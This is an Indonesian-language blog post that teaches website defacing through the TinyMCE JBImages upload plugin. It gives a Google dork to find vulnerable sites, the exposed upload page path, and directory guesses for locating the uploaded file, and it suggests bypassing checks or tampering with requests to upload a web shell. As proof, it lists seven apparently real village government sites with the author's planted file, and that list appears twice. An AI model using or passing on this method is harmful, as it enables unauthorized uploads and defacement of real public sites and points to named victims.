Bismillahirrahmanirrahim
Wassalamu'alaikum warahmatullahi wabarokatu
Hai Kawan-Kawan.........Pada siang hari ini saya akan membagikan sedikit ilmu silat online :V
Yaitu defacing.
Cara deface Methode Plugins Tiny MCE yaitu JBIMAGES
Method ini hanya bisa upload file JPG gaes :V
Kalo ada yang berambisi upload Shell, Bypass aja atau Tamper data
Bahan2:
1.PC
2.Koneksi internet
3.Dork
4.Exploit
Dork : inurl:tiny_mce/plugins/jbimages/
Exploit : tiny_mce/plugins/jbimages/dialog-v4.htm
Proof Of Concept
1.Dorking terlebih dahulu ke google
EXPLOIT : /tiny_mce/plugins/jbimages/dialog-v4.htm
3.Kita upload gambar kita jika berhasil maka akan muncul gambar seperti dibawah
4.Akses file: site.com/assets/images/filemu.jpg
Jika not found coba akses dir lain site.com/images/filemu.jpg
site.com/admin/images/filemu.jpg
Biasanya folder images terletak sebelum folder JS
alHASILnya:
http://www.logandeng-playen.desa.id/assets/images/rz.jpg
http://sawahan-ponjong.desa.id/assets/images/rz.jpg
http://bendung-semin.desa.id/assets/images/rz.jpg
http://kepek-wonosari.desa.id/assets/images/rz.jpg
http://girijati-purwosari.desa.id/assets/images/rz.jpg
http://candirejo-semin.desa.id/assets/images/rz.jpg
http://karangwuni-rongkop.desa.id/assets/images/rz.jpg
alHASILnya:
http://www.logandeng-playen.desa.id/assets/images/rz.jpg
http://sawahan-ponjong.desa.id/assets/images/rz.jpg
http://bendung-semin.desa.id/assets/images/rz.jpg
http://kepek-wonosari.desa.id/assets/images/rz.jpg
http://girijati-purwosari.desa.id/assets/images/rz.jpg
http://candirejo-semin.desa.id/assets/images/rz.jpg
http://karangwuni-rongkop.desa.id/assets/images/rz.jpg
OK sekian dari saya jika ada yang tidak jelas chat saya
My Facebook
My Facebook
Wassalamu'alaikum warahmatullahi wabarokatu
EmoticonEmoticon